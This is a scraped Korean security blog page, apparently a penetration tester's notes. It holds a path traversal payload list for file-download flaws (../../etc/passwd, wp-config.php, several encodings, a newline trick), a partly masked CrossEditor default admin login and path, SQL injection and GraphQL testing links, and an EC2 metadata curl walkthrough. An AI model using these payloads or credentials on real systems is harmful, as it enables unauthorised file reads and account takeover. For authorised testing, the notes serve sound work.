'웹' 카테고리의 다른 글
ckeditor release-notes (0) | 2021.12.27 |
---|---|
websquare 이하 경로 (0) | 2021.12.21 |
apache tomcat tree (0) | 2021.11.08 |
overflow error based 확인 (0) | 2021.10.27 |
파일 다운로드 우회 링크 (0) | 2021.10.17 |
ckeditor release-notes (0) | 2021.12.27 |
---|---|
websquare 이하 경로 (0) | 2021.12.21 |
apache tomcat tree (0) | 2021.11.08 |
overflow error based 확인 (0) | 2021.10.27 |
파일 다운로드 우회 링크 (0) | 2021.10.17 |
websquare 이하 경로 (0) | 2021.12.21 |
---|---|
proxy tool (0) | 2021.11.17 |
overflow error based 확인 (0) | 2021.10.27 |
파일 다운로드 우회 링크 (0) | 2021.10.17 |
그누보드 cheditor 건 (0) | 2021.10.12 |
https://www.exploit-db.com/docs/english/37733-bigint-overflow-error-based-sql-injection.pdf
https://titanwolf.org/Network/Articles/Article?AID=c38bf9ea-d8de-41b6-bf61-4ac39ad98102
proxy tool (0) | 2021.11.17 |
---|---|
apache tomcat tree (0) | 2021.11.08 |
파일 다운로드 우회 링크 (0) | 2021.10.17 |
그누보드 cheditor 건 (0) | 2021.10.12 |
cross editor default password (0) | 2021.10.10 |
* 파일 다운로드 경로 우회
1) 파일 다운로드 경로
../../../../etc/passwd
../../../../etc/hosts
../../../../winnt/win.ini
../../../../boot.ini
../../../../wp-config.php
2) 인코딩
../../../../etc/passwd
%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
../../../../../../../../../etc/hosts
인코딩 %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%68%6f%73%74%73
더블 인코딩 %252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2fetc%2fhosts
3) 전자정부 표준프레임워크 사용
imageSrc.do?path=/....//....//....//....//....//....//....//....//....//....//etc/&physical=passwd
4) 그 외
passwd %70%61%73%73%77%64
16bit 유니코드인코딩 .(%u002e), /(%u2215), \(%u2216)
더블URL 인코딩 .(%252e), /(%252f), \(%255c)
유닉스 ../../../../etc/passwd%0a.jpg > 개행문자(%0a)를 삽입 가능
https://itinformation.tistory.com/46
apache tomcat tree (0) | 2021.11.08 |
---|---|
overflow error based 확인 (0) | 2021.10.27 |
그누보드 cheditor 건 (0) | 2021.10.12 |
cross editor default password (0) | 2021.10.10 |
graphql 모의해킹 수행 (진행 중) (2) | 2021.09.08 |
https://webhack.dynu.net/?idx=20170130.001
overflow error based 확인 (0) | 2021.10.27 |
---|---|
파일 다운로드 우회 링크 (0) | 2021.10.17 |
cross editor default password (0) | 2021.10.10 |
graphql 모의해킹 수행 (진행 중) (2) | 2021.09.08 |
EC2 meta data 인스턴스 (0) | 2021.08.31 |
/crosseditor/manage/index.html
기본은 adm**/1**4
파일 다운로드 우회 링크 (0) | 2021.10.17 |
---|---|
그누보드 cheditor 건 (0) | 2021.10.12 |
graphql 모의해킹 수행 (진행 중) (2) | 2021.09.08 |
EC2 meta data 인스턴스 (0) | 2021.08.31 |
a-pentesters-guide-to-server-side-request-forgery-ssrf (0) | 2021.08.30 |
https://www.hahwul.com/2019/06/23/graphqlmap/
https://jonnung.dev/graphql/2019/08/05/python-graphql-graphene-tutorial/
https://github.com/swisskyrepo/GraphQLmap
그누보드 cheditor 건 (0) | 2021.10.12 |
---|---|
cross editor default password (0) | 2021.10.10 |
EC2 meta data 인스턴스 (0) | 2021.08.31 |
a-pentesters-guide-to-server-side-request-forgery-ssrf (0) | 2021.08.30 |
AWS API 호출하기 (1) – 개론편 (0) | 2021.08.30 |
Amazon EC2의 설정을 자동으로 하기 위해선 인스턴스의 정보를 받아와서 설정할 수 있어야 한다.
예를 들어 특정 태그로 묶인 그룹에게 재가동시 소스코드 갱신과 서버 재가동의 명령어를 init.d에 등록했을 때 인스턴스 정보를 얻어온다면 개별적으로 인스턴스의 역할에 맞는 work load를 할당할 수 있을 것이다.
Metadata에 대해서 찾아보니 위키백과에 아래와 같이 쓰여 있었다.
이 뜻을 인스턴스에 대입해보면, 인스턴스에 대한 데이터라고 생각해볼 수 있다.
여기에는 인스턴스가 가지고 있는 intance-id값과 같이 인스턴스의 특성을 알 수 있는 값들이 있을 것이다.
아래와 같이 예제를 통해 인스턴스의 Meta-data를 받아 본다.
169.254.169.254 라는 IP는 인스턴스의 정보를 받아 볼 수 있는 IP이다. 이 IP를 통해 정보를 받는다.
$ curl http://169.254.169.254/latest/meta-data/ ami-id ami-launch-index ami-manifest-path block-device-mapping/ hostname instance-action instance-id instance-type local-hostname local-ipv4 mac metrics/ network/ placement/ profile public-hostname public-ipv4 public-keys/ reservation-id security-groups services/ # 인스턴스의 ami id $ curl http://169.254.169.254/latest/meta-data/ami-id ami-ccccccccc # 인스턴스의 Security group $ curl http://169.254.169.254/latest/meta-data/security-groups my-security-group1 my-security-group2 # 인스턴스의 Role 정보 $ curl http://169.254.169.254/latest/meta-data/iam/info { "Code" : "Success", "LastUpdated" : "2017-11-05T13:34:37Z", "InstanceProfileArn" : "arn:aws:iam::111111111:instance-profile/my-instance-role", "InstanceProfileId" : "AAAAAAAAAAAAAA" }
지금까지 인스턴스의 정보를 받아보았다. 169.254.169.254에 get 요청을 하면 받는 인스턴스 정보를 특정하여 받아볼 수 있는데, 이는 활용하는 사람에 따라 다양하게 적용할 수 있을 것이다.
먼저 Security Group의 정보를 받을 경우에는 인스턴스가 가동할 때 원하는 Security-Group이 할당여부를 확인할 수 있을 것이다. 또한 Role 을 받아오면 인스턴스의 역할을 명확히 알 수 있기 때문에, 인스턴스의 소스코드를 갱신하여 인스턴스가 재시작 될 때마다 동작해야 할 명령어들을 구분지을 수 있다.
다른 활용 방법을 간단하게 구상해보자. 특정 S3에는 스크립트 파일들을 모아두고 role과 파일명을 일치해둔다. 그리고 AMI를 만드는데 내용은 다음과 같다. 가동될 때 meta-data로 role정보를 받아오면 role과 일치하는 S3버킷의 파일을 받아와 shell 또는 python 등 자신이 자신있는 script로 실행한다. script가 실행되면 각 인스턴스의 역할에 맞는 서버가 가동된다.
이런 식으로 설정을 한다면 Scaling Group이 Scale out이 될 때 큰 걱정없이 배포용 코드로 서버들이 가동될 수 있을 것이다.
cross editor default password (0) | 2021.10.10 |
---|---|
graphql 모의해킹 수행 (진행 중) (2) | 2021.09.08 |
a-pentesters-guide-to-server-side-request-forgery-ssrf (0) | 2021.08.30 |
AWS API 호출하기 (1) – 개론편 (0) | 2021.08.30 |
Oauth CSRF 대응방안 (0) | 2021.08.17 |
graphql 모의해킹 수행 (진행 중) (2) | 2021.09.08 |
---|---|
EC2 meta data 인스턴스 (0) | 2021.08.31 |
AWS API 호출하기 (1) – 개론편 (0) | 2021.08.30 |
Oauth CSRF 대응방안 (0) | 2021.08.17 |
Line Notify (0) | 2021.08.16 |
EC2 meta data 인스턴스 (0) | 2021.08.31 |
---|---|
a-pentesters-guide-to-server-side-request-forgery-ssrf (0) | 2021.08.30 |
Oauth CSRF 대응방안 (0) | 2021.08.17 |
Line Notify (0) | 2021.08.16 |
oauth jwt 차이 (0) | 2021.07.27 |